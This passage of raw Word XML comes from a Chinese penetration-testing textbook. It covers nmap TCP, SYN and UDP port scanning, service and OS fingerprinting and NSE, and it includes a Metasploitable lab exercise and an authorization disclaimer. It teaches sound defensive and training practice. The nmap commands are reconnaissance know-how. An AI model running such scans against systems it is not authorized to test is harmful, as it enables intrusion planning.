          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（靶机迁移任务）在已搭建的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验环境中，分别使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sU</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描同一目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP（占位符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），对比输出结果的差异，并尝试使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-Pn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳过主机发现。记录每种扫描完成的时间，并思考在真实授权渗透测试中如何根据场景选择扫描类型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口扫描的本质是向目标端口发送特定协议探测包，根据响应对端口状态进行推断，其可行性源于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议栈的开放性假设。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- TCP connect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描调用系统标准函数完成完整握手，实现简单但暴露明显；SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描通过半开放握手提升隐蔽性，但依赖原始套接字且仍可能被高级检测手段捕获。①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描因协议无连接和依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不可达而变得缓慢且充满不确定性，适用于特定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务的探测。①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所有扫描结果均受中间防火墙、IDS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及主机防御配置影响，简化的理想模型在实战中需要结合多模式扫描与人工分析才能逼近真实情况。③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御方可通过侦测扫描特征、限制反馈信息、部署欺骗性措施等方式，大幅削弱扫描的价值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Gordon Lyon (Fyodor),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该书由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作者撰写，对扫描机理、Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">引擎设计与所有扫描选项有极详尽的解释，是端口扫描领域的权威参考。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Chris Sanders,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过抓包实操理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标志位与扫描报文，可加深对协议层面攻防的直观认知。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OWASP Testing Guide v4.2,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Information Gathering”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部分，提供了端口扫描在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全测试流程中的定位与最佳实践。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="93"/>
    <w:bookmarkStart w:id="94" w:name="nmap-实战版本指纹nse-与靶机扫描"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实战:版本指纹、NSE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与靶机扫描</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在上一节中，我们从攻击者视角系统剖析了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全连接扫描、SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">半开扫描与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描的协议级机理，这些技术回答了“哪些端口在监听”这一关键问题。然而，攻击者绘制目标攻击面的过程远未结束。本节将扫描机理（5.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节）所建立的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">握手与端口状态判定逻辑，推进到实战的核心环节：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">服务版本指纹、操作系统指纹以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">脚本引擎（NSE）的应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。攻击者通过端口扫描获得开放端口清单后，迫切需要知道每个端口背后运行的是哪一种具体的服务软件及其版本，以及目标主机运行的是哪一种操作系统，以便搜索已知漏洞并规划后续攻击路径。防御者则必须理解这些指纹技术的原理，才能在自己的网络中有力地减少信息泄露、部署欺骗与检测机制。本节将在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机上逐步展示命令执行与结果判读，所有操作仅限于授权实验环境。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节操作建立在以下基础之上：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描机理：TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">半开扫描（SYN）、全连接扫描（connect）及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描的原理与报文交互，已见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节（尤其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机判定逻辑）。本节直接使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sU</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等扫描类型，不再重复报文交互。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机环境：Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机构建与网络隔离要求回指第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章。本节沿用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指代授权靶机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;LAB_SUBNET&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指代实验网段。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">侦察输入：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举与主动侦察得到的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址段、子域名等信息，可作为本节扫描的输入目标。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">底层协议：TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">栈在网络层的核心行为回指《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机），在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 25–26 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（ARP、IP、路由）中也有涉及，此处直接使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框（强制）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节包含的所有命令与操作，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">仅限于读者自行搭建的隔离实验网络、官方授权的靶机环境（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploitable、HackTheBox、TryHackMe、VulnHub、OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">镜像）或已获取书面授权的渗透测试目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。实验网络必须与生产网络及公网物理或逻辑隔离。未经授权对他人系统进行端口扫描、服务探测或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本执行，在多数司法管辖区属于违法行为，可能触犯刑法或民法。请务必确认已获得有效授权后再执行任何扫描。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在获得开放端口列表后，攻击者希望获取服务软件的确切名称、版本，以便利用已知漏洞（例如特定版本的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsftpd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后门、Samba</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓冲区溢出）。同时，了解操作系统类型和版本有助于选择对应的投递方式（Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞利用、命令语法差异）。NSE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本更可直接执行漏洞探测、弱口令爆破等操作，大大加速攻击过程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：知道扫描的精细程度，有助于加固系统。通过伪装服务版本、操作系统特征，可增加指纹识别的误判；通过网络入侵检测系统识别指纹扫描流量模式、限制扫描速率，可以在攻击早期发现并阻断侦察活动。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="94"/>
    <w:bookmarkEnd w:id="95"/>
    <w:bookmarkStart w:id="96" w:name="原理直觉从门开了到门后是谁"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉：从“门开了”到“门后是谁”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口扫描回答了“哪些门是开着的”，但攻击者想知道门后是什么类型的服务，以及整栋建筑（操作系统）的架构。服务版本检测的原理直觉是：不同软件实现在接收到探测数据时，往往会返回不同的响应格式、欢迎标语、错误消息或处理行为的微妙差异。例如，同样是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口，OpenSSH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回的版本字符串为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dropbear </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回的是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH-2.0-dropbear_2020.81</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过发送一系列预期能触发服务特征响应的探针，将捕获到的报文与内置的指纹数据库进行匹配，进而识别出服务名与版本（①【标准/通用原理，跨环境成立】，但具体识别出的版本字符串因目标服务器实际安装版本而定②）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作系统指纹（OS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Fingerprint）的直觉类似：不同操作系统的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议栈实现细节存在微小差异，例如初始序列号（ISN）生成算法、IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分片重组的超时行为、TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项（如窗口缩放因子、时间戳）的格式、以及对非标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FIN/URG/PSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组合的响应等。Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过发送一系列精心设计的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP、UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">探测包，收集目标的响应特征，生成一个“指纹”，再与内置的数千个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签名比对，推断出操作系统类型和版本。这一机制高度依赖</w:t>
      </w:r>
      <w:r>
